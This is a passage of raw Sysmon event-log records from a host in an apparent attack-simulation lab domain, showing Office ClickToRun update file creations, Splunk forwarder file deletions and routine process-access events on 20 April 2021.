11241100x800000000000000063732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txt2021-04-20 14:54:01.534 11241100x800000000000000063731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:01.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe2021-04-20 14:54:01.534 11241100x800000000000000063730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Shared.v11.1.dll2021-04-20 14:54:01.534 11241100x800000000000000063729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.Misc.v11.1.dll2021-04-20 14:54:01.534 11241100x800000000000000063728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.519{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.Misc.v8.1.dll2021-04-20 14:54:01.519 11241100x800000000000000063727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.519{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraChart.v11.1.Design.dll2021-04-20 14:54:01.519 11241100x800000000000000063726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraChart.v8.1.Design.dll2021-04-20 14:54:01.503 11241100x800000000000000063725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinChart.v11.1.dll2021-04-20 14:54:01.487 11241100x800000000000000063724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinEditors.v11.1.dll2021-04-20 14:54:01.487 11241100x800000000000000063723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinEditors.v8.1.dll2021-04-20 14:54:01.472 11241100x800000000000000063722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.472{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinGrid.v11.1.dll2021-04-20 14:54:01.472 11241100x800000000000000063721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinGrid.v8.1.dll2021-04-20 14:54:01.456 11241100x800000000000000063720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinStatusBar.v11.1.dll2021-04-20 14:54:01.440 11241100x800000000000000063719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinStatusBar.v8.1.dll2021-04-20 14:54:01.440 11241100x800000000000000063718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTabControl.v11.1.dll2021-04-20 14:54:01.440 11241100x800000000000000063717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTabControl.v8.1.dll2021-04-20 14:54:01.440 11241100x800000000000000063716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v11.1.dll2021-04-20 14:54:01.440 11241100x800000000000000063715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v8.1.dll2021-04-20 14:54:01.409 11241100x800000000000000063714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTree.v11.1.dll2021-04-20 14:54:01.394 11241100x800000000000000063713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTree.v8.1.dll2021-04-20 14:54:01.394 11241100x800000000000000063712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.394{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.v11.1.dll2021-04-20 14:54:01.394 11241100x800000000000000063711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\MSVCR110.DLL2021-04-20 14:54:01.362 11241100x800000000000000063710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\NativeShim.dll2021-04-20 14:54:01.347 11241100x800000000000000063709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\NativeShim.Resources.dll2021-04-20 14:54:01.347 11241100x800000000000000063708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Northwoods.Go.dll2021-04-20 14:54:01.347 11241100x800000000000000063707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\stdole.dll2021-04-20 14:54:01.347 11241100x800000000000000063706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Compression.Base.dll2021-04-20 14:54:01.347 11241100x800000000000000063705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Core.dll2021-04-20 14:54:01.347 11241100x800000000000000063704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Base.dll2021-04-20 14:54:01.347 11241100x800000000000000063703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Grouping.Base.dll2021-04-20 14:54:01.347 11241100x800000000000000063702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Grouping.Windows.dll2021-04-20 14:54:01.347 11241100x800000000000000063701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grid.Windows.dll2021-04-20 14:54:01.331 11241100x800000000000000063700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Grouping.Base.dll2021-04-20 14:54:01.331 11241100x800000000000000063699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Shared.Base.dll2021-04-20 14:54:01.315 11241100x800000000000000063698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Shared.Windows.dll2021-04-20 14:54:01.300 11241100x800000000000000063697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Tools.Base.dll2021-04-20 14:54:01.300 11241100x800000000000000063696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Tools.Windows.dll2021-04-20 14:54:01.300 23542300x800000000000000063695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.300{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F590C07BDC2E106F0E494E02B43B5758,SHA256=0D289C8F0B51877A30121050BC9B8358A4D1E63F52900FF47497E492570514FC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.XlsIO.Base.dll2021-04-20 14:54:01.269 11241100x800000000000000063693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\IEAWSDC.DLL2021-04-20 14:54:01.237 11241100x800000000000000063692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MeetingJoinAxOC.dll2021-04-20 14:54:01.237 23542300x800000000000000063691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=018DA42B7BF5FE887573F89EC06EE5DD,SHA256=2C93CA8E9075B734CE4DEDEBAB350F69ECA25B03B329209BB8E871C95348AC1C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:01.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE2021-04-20 14:54:01.237 11241100x800000000000000063689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp120.dll2021-04-20 14:54:01.237 10341000x800000000000000063688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB09-607E-720B-00000000BB01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB09-607E-720B-00000000BB01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 11241100x800000000000000063682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcr120.dll2021-04-20 14:54:01.237 10341000x800000000000000063681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.237{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB09-607E-720B-00000000BB01}4808C:\Program 